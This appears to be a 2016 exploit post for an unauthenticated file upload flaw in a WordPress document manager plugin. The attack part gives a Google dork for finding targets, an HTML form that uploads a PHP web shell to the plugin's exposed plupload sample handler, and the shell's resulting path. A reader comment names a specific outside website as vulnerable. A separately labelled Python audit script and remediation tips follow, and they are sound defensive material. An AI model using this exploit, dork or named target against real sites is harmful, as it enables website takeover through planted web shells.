Unknown On 03/09/16



# Exploit Title: WordPress Plugin SP Project & Document Manager Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/sp-client-document-manager-premium/
# Date: 03/09/2016
# Software Link: https://wordpress.org/plugins/sp-client-document-manager/
# Version: Any Version
# Tested on: Windows
# Author : AnoaGhost

Exploit CSRF :

<form method="post" action="http://site.com/path/wp-content/plugins/sp-client-document-manager-premium/js/plupload/examples/upload.php" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="nameshell in here.php" />
<input type="submit" />
</form>


Poc :
http://site.com/path/wp-content/plugins/sp-client-document-manager-premium/js/plupload/examples/upload.php


Shell Path :
http://site.com/path/wp-content/uploads/sp-client-document-manager/nameshell in here.php
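Defender-side check, added here as an example and not part of the original advisory: it walks a wp-content directory and reports any plugin that still ships the plupload sample upload handler named above, plus any server-executable script sitting under uploads/. The extension list, the function names and the sample tree (including the plugin called hypothetical-plugin) are assumptions constructed for the demo.

```python
import os
import tempfile

# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
SCRIPT_EXTS = (".php", ".php5", ".phtml", ".phar")

def audit_wp_content(wp_content):
    """Return (exposed_handlers, scripts_in_uploads) as sorted relative paths."""
    handlers, scripts = [], []
    for dirpath, _dirs, files in os.walk(wp_content):
        rel_dir = os.path.relpath(dirpath, wp_content).replace(os.sep, "/")
        for name in files:
            rel = f"{rel_dir}/{name}"
            # plupload's sample handler is a standalone script, so a request to it
            # never passes through WordPress or the plugin's own access checks.
            if rel.startswith("plugins/") and rel.endswith("plupload/examples/upload.php"):
                handlers.append(rel)
            # uploads/ should hold data only; a script there needs review.
            elif rel.startswith("uploads/") and name.lower().endswith(SCRIPT_EXTS):
                scripts.append(rel)
    return sorted(handlers), sorted(scripts)

def build_sample_tree(root):
    """Constructed sample layout mirroring the paths in this advisory."""
    sample = [
        "plugins/sp-client-document-manager-premium/js/plupload/examples/upload.php",
        "plugins/hypothetical-plugin/lib/plupload/examples/upload.php",
        "plugins/hypothetical-plugin/main.php",
        "uploads/sp-client-document-manager/report.pdf",
        "uploads/sp-client-document-manager/unexpected.PHP",
        "uploads/2016/03/photo.jpg",
    ]
    for rel in sample:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()

def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit_wp_content(root)

if __name__ == "__main__":
    handlers, scripts = demo()
    for h in handlers:
        print("REMOVE sample upload handler:", h)
    for s in scripts:
        print("REVIEW script in uploads:", s)
```

On a real host, call audit_wp_content() with the path to the site's wp-content directory; deleting the examples/ directory and disabling script execution under uploads/ closes both findings.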

2 Responses so far.

  1. Found one with the same bug, bro: http://www.beraldoodontologia.com.br/wp-content/plugins/wp-landing-page/lib/plupload/examples/upload.php
